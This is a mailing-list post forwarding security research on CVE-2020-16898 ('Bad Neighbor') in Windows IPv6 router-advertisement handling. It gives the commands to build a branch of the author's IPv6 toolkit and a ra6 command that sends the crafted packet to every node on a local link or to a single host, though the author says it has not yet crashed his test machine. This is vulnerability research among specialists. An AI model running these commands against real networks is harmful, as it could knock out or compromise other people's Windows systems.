[LAC-TF] Fwd: CVE-2020-16898: "Bad Neighbor" (IPv6 SLAAC/RDNSS)
fgont at si6networks.com
Wed Oct 14 13:47:56 -03 2020
-------- Forwarded Message --------
Subject: CVE-2020-16898: "Bad Neighbor" (IPv6 SLAAC/RDNSS)
Date: Wed, 14 Oct 2020 13:24:22 -0300
From: Fernando Gont <fgont at si6networks.com>
To: IPv6 Hackers Mailing List <ipv6hackers at lists.si6networks.com>
You may be aware about CVE-2020-16898. If not, now you are :-) :
I've produced PoC for the aforementioned vulnerability according to the
description on the McAfee site, but somehow I seem to fail to trigger
the "Blue Screen Of Death" when trying the attack against my local MS
Windows 10 installation.
FWIW, the packet I'm sending can be downloaded (pcap) here:
The packet can be crafted with the ra6 tool of the SI6 toolkit present
in the "nd-opt-fuzzing" branch of the github repo
(https://github.com/fgont/ipv6toolkit). That is,
git clone https://github.com/fgont/ipv6toolkit.git
git checkout nd-opt-fuzzing
sudo make install
And then run the ra6 tool as:
sudo ra6 -i INTERFACE --bad-neighbor -d ff02::1 -v -e
Note that this will target all nodes on the local-link for the INTERFACE
interface. You may set the "-d" option to a unicast address if you want
to target a single system.
I'll keep looking further into this issue and report back to the group
if I find anything.
If you do play with the tool and test the PoC, please do let me/us know.
e-mail: fgont at si6networks.com
PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492
More information about the LACTF